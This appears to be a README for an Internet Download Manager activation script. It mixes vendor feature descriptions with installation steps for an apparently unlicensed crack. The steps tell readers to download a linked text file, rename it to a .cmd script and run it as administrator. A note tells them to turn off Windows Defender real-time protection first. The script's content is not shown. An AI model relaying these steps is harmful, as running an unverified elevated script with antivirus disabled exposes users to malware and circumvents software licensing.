### Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads.

## Table of contents

- [Installation process](#installation-process)
- [Note](#note)
- [Supported Browser](#all-popular-browsers-are-supported)
- [Credits](#credits)
- [licence](#license)

# Installation process

- First Of All [Visit](https://www.internetdownloadmanager.com/) IDM Official Site & Download IDM.exe & Then Install It.

- Then [Download](IAS_0.7_CRC32_58F0EACC.txt) This File.

- Open text file and Type "your name" [Demo](./screenshots/Screenshot_NameChange.png)

- Then Rename The File 'IAS_0.7_CRC32_58F0EACC' As IAS_0.7_CRC32_58F0EACC.cmd

- Run The File (run as administrator)

## Note

- Go to Windows defender
- Turn off Real-Time Protection (After install .Cmd file Turn On ) ![Alt text](screenshots/Screenshot%20windows%20defender.png)

## Download faster and more reliably

Install Internet Download Manager (IDM) to stop waiting for your downloads. You will be truly amazed how fast IDM downloads your files. IDM will also repair broken and resume interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages.

## All popular browsers are supported

IDM integrates seamlessly into Google Chrome, FireFox, Microsoft Edge, Opera, Safari, Internet Explorer, AOL, MSN, Maxthon and all other popular browsers. We develop browser extensions since 1999, and we have the best engineering solutions available today. IDM offers the installation of its extensions for Chrome, Firefox, old and new Edge, Opera and other browsers.

- Install IDM extension for [Google Chrome](https://chrome.google.com/webstore/detail/idm-integration-module/ngpampappnmepgilojfohadhhmbhlaek)
- Install IDM add-on for [Mozilla Firefox](https://addons.mozilla.org/en-US/firefox/addon/tonec-idm-integration-module/)
- Install IDM extension for [Microsoft Edge](https://microsoftedge.microsoft.com/addons/detail/idm-integration-module/llbjbkhnmlidjebalopleeepgdfgcpec)

You need always to keep IDM extensions installed and enabled in browsers to take over downloads from the browsers and to have IDM's right click menu items! If you have any problem, first check that "IDM integration module" extension is installed and enabled in your browser.

# Download selected files with one click

When several links are selected with a mouse in a browser, IDM will show "Download with IDM" button. You can also minimize this button in "Options→General tab→Customize download panel in browsers" IDM dialog .

# Download files from your favorite web sites

After installing "IDM integration module" browser extension, just continue surfing the Internet, and you will be amazed how easy is to download everything you want from your favorite web sites with IDM video download panel.

# Built-in Scheduler

Internet Download Manager can connect to the Internet at a set time, download the files you want, disconnect, or shut down your computer when it's done. You can also synchronize changes using periodic synchronization of files. It's possible to create and schedule several download queues for downloading or synchronization.

# Download categories

Internet Download Manager can be used to organize downloads automatically using defined download categories. You can add your custom categories for some file types or specific sites.

# Customizable Interface

You may choose the order, buttons and columns to appear on the main IDM window. There are several different skins for the toolbar with different button styles. All skins can be downloaded from IDM home site. Also users can design their own skins. Also you can choose the light or dark IDM theme.

# Credits

[SCRIPT](Credits.md)

**Blog written by** [@TELEKIIT](https://www.telekiit.me/)

# License
